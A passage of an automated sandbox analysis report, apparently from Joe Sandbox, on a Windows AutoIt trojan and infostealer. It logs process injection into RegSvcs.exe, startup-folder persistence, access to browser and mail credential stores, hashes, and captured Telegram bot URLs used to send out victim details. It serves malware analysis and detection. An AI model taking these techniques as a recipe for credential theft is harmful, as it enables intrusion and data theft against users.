                Source: 3i1gMM8K4z.exe, ghauts.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0862B cpuid 0_2_00F0862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F14E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F14E87
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F21E06 GetUserNameW,0_2_00F21E06
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F13F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F13F3A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EE49A0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4175454469.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: ghauts.exe | Binary or memory string: WIN_81
                Source: ghauts.exe | Binary or memory string: WIN_XP
                Source: ghauts.exe | Binary or memory string: WIN_XPe
                Source: ghauts.exe | Binary or memory string: WIN_VISTA
                Source: ghauts.exe | Binary or memory string: WIN_7
                Source: ghauts.exe | Binary or memory string: WIN_8
                Source: ghauts.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4175454469.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F56283
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F56747
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_00606283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00606283
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_00606747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00606747
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 3 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 111 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; Dynamic API Resolution
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 137 System Information Discovery; 231 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 1 Web Service; 4 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph ID: 1588301 | Sample: 3i1gMM8K4z.exe | Startdate: 10/01/2025 | Architecture: WINDOWS | Score: 100
                Contacted domains/IPs: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
                Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
                api.telegram.org: Uses the Telegram API (likely for C&C communication)
                3i1gMM8K4z.exe (started)
                    Dropped: C:\Users\user\AppData\Local\...\ghauts.exe, PE32
                    Signatures: Binary is likely a compiled AutoIt script file
                    Started: ghauts.exe
                wscript.exe (started)
                    Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Started: ghauts.exe
                ghauts.exe (started by 3i1gMM8K4z.exe)
                    Dropped: C:\Users\user\AppData\Roaming\...\ghauts.vbs, data
                    Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
                    Started: RegSvcs.exe
                ghauts.exe (started by wscript.exe)
                    Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                    Started: RegSvcs.exe
                RegSvcs.exe (started by the ghauts.exe instance spawned from 3i1gMM8K4z.exe)
                    Network: api.telegram.org 149.154.167.220, 443, 49754, 49772 TELEGRAMRU United Kingdom
                    Network: checkip.dyndns.com 158.101.44.242, 49731, 49734, 49736 ORACLE-BMC-31898US United States
                    Network: reallyfreegeoip.org 104.21.16.1, 443, 49732, 49733 CLOUDFLARENETUS United States
                RegSvcs.exe (started by the ghauts.exe instance spawned from wscript.exe)
                    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

                Source | Detection | Scanner | Label | Link
                3i1gMM8K4z.exe | 66% | ReversingLabs | Win32.Trojan.AutoitInject |
                3i1gMM8K4z.exe | 100% | Joe Sandbox ML | |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Okeghem\ghauts.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Okeghem\ghauts.exe | 66% | ReversingLabs | Win32.Trojan.AutoitInject |
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                reallyfreegeoip.org | 104.21.16.1 | true | false | | high
                api.telegram.org | 149.154.167.220 | true | false | | high
                checkip.dyndns.com | 158.101.44.242 | true | false | | high
                checkip.dyndns.org | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                http://checkip.dyndns.org/ | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.16.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588301
Start date and time: 2025-01-10 23:43:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3i1gMM8K4z.exe (renamed because the original name is a hash value)
Original Sample Name: ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 57
• Number of non-executed functions: 277
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 3i1gMM8K4z.exe
Time | Type | Description
17:44:11 | API Interceptor | 12753694x Sleep call for process: RegSvcs.exe modified
22:44:11 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs
Process: C:\Users\user\Desktop\3i1gMM8K4z.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1147904
Entropy (8bit): 7.1731495033367105
Encrypted: false
SSDEEP: 24576:cu6J33O0c+JY5UZ+XC0kGso6FaNAaW2Kh7ZClY9lnmWY:Gu0c++OCvkGs9FaNAaWphNCC1Y
MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570
SHA1: 0B0DF40AFE9BED5720C361FE7ED63395E1A25F41
SHA-256: DDADBDA4F90DC1D05F3E78AC6E5009C2E6608137B60BCE3427E25FFEA1B4D944
SHA-512: 9AB7671F48D5DBEB58C93B61998762ED91DA2F566421FF11F53EDFDB6A65AF0199FF4BB31647EC296CAE7F85BA7CFC71340FBB931E6A05FD5AA03A43F5026057
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 66%
Reputation: low
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....(Vg.........."..................}............@..................................z....@...@.......@.....................L...|....p.......................p...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q...p...r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\3i1gMM8K4z.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240744
                                                                                                                          Entropy (8bit):7.982774782035282
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:tHujT6bLm2gO5yFVYkZeg9yqRI/FXJUasyvghJmWMZBTDn8sHyyedQ43XfFvR3Yy:tMW3YJ4lCwvmLKZxD1SDQ6uklGr+O/2
                                                                                                                          MD5:3EFEF33DE4B9A0746F48ED50D0329CA5
                                                                                                                          SHA1:C3827793FF34405CFE9960D58CF1A1FA9C93ECA2
                                                                                                                          SHA-256:6348A723FDA7F47D932D00E92F6E5FFC24228B6931F819AEDEEC3A078A3ECA25
                                                                                                                          SHA-512:888F7D9DF9C3001807E6DC3101E488599FA4DCBCA8B3472C6261AC37E8082FE6A5150965C06D48D106EDC12665EE7AF06B6062ADC7FC89ACD90E928B1DB7188A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:EA06.....[x5.=..E.U...n..B.Q.T...7..h.....X.U.T*...j .....X.U<s.......f1.E..>..nSi..9.V.3.,.o*.]...._,.K......M..;."{\..,fE].Y..m..7...}|..u..-.}..w..RoR.t..4..#3...a.N*.......I......>.G....._)..'[:H...R.d...h.....h....F..@....l.z..sV..&uj.j..-].@.EX...Q......V..)5..P.c4....)u..F.....*...2.R..1K...4...U@M;.T.1@.fmG.@.......F..&4.(....Y..........Y.Q.h..\.........Y.......aR.,.n5.$..7.M.2..[./..?...d...V..>....w..d.)........ .B...Oj`...J.J..2.,..X...5j,.aV.u.tjU.d...\....G..-....bW.5..J.l7...F...Vx.....2.f..8..0..&..#....3X.'.5..kjt.......v...0..i.^.+U...v_.>W.....W...-..N...'..M..e.....E..9.e...............(.....Z..u4ZF._].W..].>.V..+t..f............\..gi...........L.&..+...a.]..fqb..w1...{...y...9..\.4j5./....k.F...2M.ku...+ !..{7..}.k......x.j..aV....._............t..n....2.^....,b..T.Q\..r.[.OQ4.L*.LG/.o.67RJ..A.N{..d.!..Ph..h.....&:...)E..f........mF...H:.[.N.J.U.{....M...:.VM..n....Oc..`*.`......1k,..I.."....e...d...sY..%....;Z..w0.%..M.y..J5n..
                                                                                                                          Process:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240744
                                                                                                                          Entropy (8bit):7.982774782035282
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:tHujT6bLm2gO5yFVYkZeg9yqRI/FXJUasyvghJmWMZBTDn8sHyyedQ43XfFvR3Yy:tMW3YJ4lCwvmLKZxD1SDQ6uklGr+O/2
                                                                                                                          MD5:3EFEF33DE4B9A0746F48ED50D0329CA5
                                                                                                                          SHA1:C3827793FF34405CFE9960D58CF1A1FA9C93ECA2
                                                                                                                          SHA-256:6348A723FDA7F47D932D00E92F6E5FFC24228B6931F819AEDEEC3A078A3ECA25
                                                                                                                          SHA-512:888F7D9DF9C3001807E6DC3101E488599FA4DCBCA8B3472C6261AC37E8082FE6A5150965C06D48D106EDC12665EE7AF06B6062ADC7FC89ACD90E928B1DB7188A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:EA06.....[x5.=..E.U...n..B.Q.T...7..h.....X.U.T*...j .....X.U<s.......f1.E..>..nSi..9.V.3.,.o*.]...._,.K......M..;."{\..,fE].Y..m..7...}|..u..-.}..w..RoR.t..4..#3...a.N*.......I......>.G....._)..'[:H...R.d...h.....h....F..@....l.z..sV..&uj.j..-].@.EX...Q......V..)5..P.c4....)u..F.....*...2.R..1K...4...U@M;.T.1@.fmG.@.......F..&4.(....Y..........Y.Q.h..\.........Y.......aR.,.n5.$..7.M.2..[./..?...d...V..>....w..d.)........ .B...Oj`...J.J..2.,..X...5j,.aV.u.tjU.d...\....G..-....bW.5..J.l7...F...Vx.....2.f..8..0..&..#....3X.'.5..kjt.......v...0..i.^.+U...v_.>W.....W...-..N...'..M..e.....E..9.e...............(.....Z..u4ZF._].W..].>.V..+t..f............\..gi...........L.&..+...a.]..fqb..w1...{...y...9..\.4j5./....k.F...2M.ku...+ !..{7..}.k......x.j..aV....._............t..n....2.^....,b..T.Q\..r.[.OQ4.L*.LG/.o.67RJ..A.N{..d.!..Ph..h.....&:...)E..f........mF...H:.[.N.J.U.{....M...:.VM..n....Oc..`*.`......1k,..I.."....e...d...sY..%....;Z..w0.%..M.y..J5n..
                                                                                                                          Process:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240744
                                                                                                                          Entropy (8bit):7.982774782035282
                                                                                                                          Encrypted:false
